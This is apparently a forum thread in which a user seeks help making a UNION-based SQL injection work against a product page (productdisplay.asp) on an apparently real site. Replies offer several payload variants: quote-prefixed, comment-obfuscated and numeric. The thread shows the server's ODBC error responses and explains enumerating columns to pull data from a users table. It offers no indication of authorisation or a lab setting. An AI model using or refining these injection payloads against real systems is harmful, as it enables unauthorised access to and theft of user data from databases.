-
sql help needed
When testing sql injection with this command:
?idProduct=-1+UNION+SELECT+1,2+FROM+users--
I am getting this error:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'UNION'.
/productdisplay.asp, line 36
I have tried adding a quotation mark before UNION, but get another error message on unclosed quotation marks. What I think I should be aiming for is to get the "must have equal expression of target sites" error message. Can anyone help me out?
-
Well I can tell you that I highly doubt they are using columns named 1 and 2. Thats what you are telling it to do :-P
-
Yeah i know that, but I'm expecting to get the "must have equal number of expressions" error message. Then just add numbers 3,4,5.... until there's no error message.Then I'll substitute in column names after that.
-
Im saying what you are essentially doing is writing a query that says:
SELECT 1,2 FROM users
but it need to look like:
Select CollumnNameA,CollumnNameB From Users where UserID = 1,2
-
Not necessarily, the only thing that matters is that the # of columns matches and that the type is correct...
If I had to guess I'd say there is possibly an issue with a quote somewhere...the other thing that looks odd is the negative product number...are you sure that isn't wigging it out?
-
yeah i just added the -1 because I've noticed in the past that it normally works, but I tried without the negative and its the same error.
-
My best guess would be something to the effect of :
?idProduct=1'+UNION+SELECT+(1,2)+FROM+users--
?idProduct=1"+UNION+SELECT+(1,2)+FROM+users--
Since it is choking on the union, my thought is it has to be something with the argument to idProduct and how the script is enclosing it in the subsequent SQL query...
-
Ok, with this injection:
1'+UNION+SELECT+(1,2)+FROM+users--
i get:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' UNION SELECT (1,2) FROM users--'.
/productdisplay.asp, line 36
and with this: 1''+UNION+SELECT+(1,2)+FROM+users--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near ''.
/productdisplay.asp, line 36
-
What does:
'+UNION+SELECT+(1,2)+FROM+users--
''+UNION+SELECT+(1,2)+FROM+users--
return? Note: no numeric argument there and the second is two '
or
1+UNION+SELECT+1,2+FROM+users/*
or
1/**/UNION/**/1,2/**/FROM/**/users/*
-
These are just returning similar errors to before